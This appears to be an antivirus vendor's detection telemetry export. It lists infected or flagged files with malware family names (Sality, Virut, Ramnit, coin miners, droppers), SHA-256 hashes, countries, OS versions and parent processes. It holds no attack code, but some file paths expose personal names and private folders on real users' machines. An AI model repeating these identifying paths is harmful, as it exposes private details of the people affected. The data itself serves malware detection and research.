  Row(detection=Row(filename='vbaproject.bin', filepath='build.doc --> word/vbaProject.bin', filesize=256000, name='HEUR/Macro.Downloader.PTA.Gen.#M5.#R140092'), hash='0e1eff9632773434de9b2ad925704780d4ebc43ea35a0752dfa99a45962aa812', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-01T15:52:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:53:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:42:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-222048-eb13278e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b7aa013\\AVSCAN-20181031-221818-D17EF57C\\AVSCAN-20181031-222048-EB13278E', filesize=1844000, name='PUA/InstallCore.#M1.#R1'), hash='bcab7c74b26935b6fabadd0c116714eacacba5cd9921c71ec255ec6a9dc00f7f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:20:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\apehnkswsbb\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:05:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\igwnpxtwly2\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T12:19:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e454e3fcb862da4067e6824294020e394d9f6bd7a657360fa04dd1930640c36c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E454E3FCB862DA4067E6824294020E394D9F6BD7A657360FA04DD1930640C36C', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='e454e3fcb862da4067e6824294020e394d9f6bd7a657360fa04dd1930640c36c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:37:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\04boqfvo3qe\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d25662e3356696a3477cf60461f00ab73846d7647a70b6c093c9e85553a8d845', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\D25662E3356696A3477CF60461F00AB73846D7647A70B6C093C9E85553A8D845', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d25662e3356696a3477cf60461f00ab73846d7647a70b6c093c9e85553a8d845', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\ANCIENPC\\C\\Program Files\\File Recovery\\undelete360\\unins000.exe', filesize=784000, name='W32/Sality.AT.#M1.#R1'), hash='d5ee8229a137c303b23ba143a490bb48d12f62f7f5b01c6ef269555c75f5e2c6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:zQpazfJNQEuD1LcM.1', country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T08:02:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145818-78d214b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145818-78D214B9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152338-9c16f12f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152338-9C16F12F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:23:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160637-39612b20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8732e122\\AVSCAN-20181101-124327-EDF9E5E7\\AVSCAN-20181101-160637-39612B20', filesize=960000, name='Adware/Elex.8edb20.#M1.#R1'), hash='8edb20b4c3a60d66ee14e570a6c1656eeec650f1468d432a8baff292709ab787', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:09:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095344-695453f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095344-695453F0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:53:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sicurezza.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SICUREZZA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sanitario.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\PFI OSS 583982\\SANITARIO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='stage fiorona.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\STAGE FIORONA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235543-f46b9c7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235543-F46B9C7C', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\資材管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='e9e4bbcee22c15ff687115b07485b70611315d171207c5907dca4fd1a40f4cc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='remselec203trial.exe', filepath='E:\\Video- Foto\\DVD\\Remote Selector - 2.0.3\\REMSELEC203TRIAL.EXE', filesize=64000, name='TR/Dropper.Gen.#M300.#R1736'), hash='887e1ab2eaf3228bd8b604427b4510bc8c5dd50748e04fbb7eb539371fe310d0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Gentibus CD\\GentibusCD.exe', parentsize=1638400, timestamp='2018-11-01T13:05:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\yovlhioihvs\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='JM', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASC.exe', parentsize=8245520, timestamp='2018-11-01T08:35:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013634-a723adc5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_833bd94a\\AVSCAN-20181102-013544-A090424E\\AVSCAN-20181102-013634-A723ADC5', filesize=1536000, name='TR/BitCoinMiner.gnhpf.#M1.#R1'), hash='f0f410fc700d2f11e1301c7bfc2d1e824f08c1964b3bd25d37c06e8d34ac0e40', metadata=Row(cmdline=None, country='QA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:06:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0040209.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0040209.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2649704\\mnnstubsetup.vir', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T02:37:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='logreader.exe', filepath='E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-04T07:57:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142216-2ab051c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-142216-2AB051C6', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='635774fceb7859d5814a2d8d7cdfd05aa9e22878bd399d98d60748e5f4f6a2d0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:52:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pegawai.exe', filepath='F:\\Dokumen KOPRASAI\\Prog_LPD\\Prog_LPD\\Exeprog\\Pegawai.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='4d3b19c2efee5016762a8f6315877b521b8dbc5b347f278f096ea80e5af0df81', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23784, timestamp='2018-11-04T08:30:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-04T23:17:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212119-2a648381', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-212119-2A648381', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:21:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\avira\\antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T11:49:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132440-58e2edc4', filepath='C:\\Windows\\TEMP\\AVSCAN-20181104-131911-30C0A57F\\AVSCAN-20181104-132440-58E2EDC4', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:24:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0344506.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP437\\A0344506.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:49:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132744-61f3e3be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132744-61F3E3BE', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:27:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winbox.exe', filepath='H:\\شغل 2015\\winbox.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='51a3fcbf15e5376f577bfd3f6c7cf63ef31bea5864a277dea09834642b504d45', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:55:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unetbootin-windows-583.exe', filepath='F:\\unetbootin-windows-583.exe', filesize=5184000, name='W32/Virut.Gen.#M1.#R1'), hash='4db5f5cdf1312bbf01fa2f20e2b7fc0e8023100990a9b3849521001770334001', metadata=Row(cmdline='--type=renderer --no-sandbox --register-...o-sandbox --register-pepper-plugins=\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Televzr\\\\\\\\resources\\\\\\\\mpv\\\\\\\\mpvjs.node;application\\\\\\/x-mpvjs\\\\\\" --serv...32CA6C8AD898C4 --lang=ar --app-path=\\\\\\"C:\\\\\\\\Users\\\\\\\\User\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Televzr\\\\\\\\resources\\\\\\\\app.asar\\\\\\" --node-integration=true --web...latform-channel-handle=1436 \\\\\\/prefetch:1', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Televzr\\Televzr.exe', parentsize=49686728, timestamp='2018-11-04T04:26:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='drvde5a.tmp', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drvDE5A.tmp', filesize=91536000, name='WORM/Taranis.1351.#M1.#R1'), hash='35381603c5044fb70d94f3e288d0d872430a7ccd89f93513407147ff269d3d6d', metadata=Row(cmdline='\xa0\\\\\\\\{48EB4DA8-227F-4E2E-A4EC-82510ABF322F}.{89B08DB4-87A2-4F33-A3EA-CB33D2A8C7D2},AEIMQUYcgkosw04H y¥?▓ y 2', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\rundll32.exe', parentsize=45056, timestamp='2018-11-04T01:18:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162152-6ce655be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ba6ce8b4\\AVSCAN-20181104-162141-6AE7A986\\AVSCAN-20181104-162152-6CE655BE', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='5c717e5ac52266be326d4133c6c3e42884c578c6e8e4733319fe9f138a3f78e9', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240eb', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240eb', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:43:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131825-37ca09c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131825-37CA09C7', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124146-619c4c0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9665639e\\AVSCAN-20181104-124037-5B2CF3F2\\AVSCAN-20181104-124146-619C4C0B', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:41:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0342688.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP434\\A0342688.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:16:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T01:45:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{B1F8264C-7F57-4B4C-97D4-B1A46CDF740E} S-1-5-18:NT AUTHORITY\\\\System:Service:', country='SV', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T11:09:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d66b', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d66b', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8906', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8906', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='regsvr32.exe', filepath='C:\\Users\\X\\Desktop\\아빠보험청구\\이중훈 영상CD\\Viewer\\ATL\\Regsvr32.exe', filesize=64000, name='TR/Patched.Gen.#M300.#R3369'), hash='47d2a52b49b64e35553fe4e302d5307e13f0e4be3bd287859cd7896f09cc21af', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T06:49:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205154-287b4424', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28c764d3\\AVSCAN-20181104-204927-17753BD2\\AVSCAN-20181104-205154-287B4424', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:52:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='shsvcs.dll', filepath='\\\\?\\E:\\文件夹备份\\d盘\\WINDOWS\\system32\\shsvcs.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='a3d818a2c0d89693823c1bee0f99cfd12fa1d27972912aadb75edfd0d4502ded', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:53:52Z'), dt=datetime.date(2018, 11, 4)),
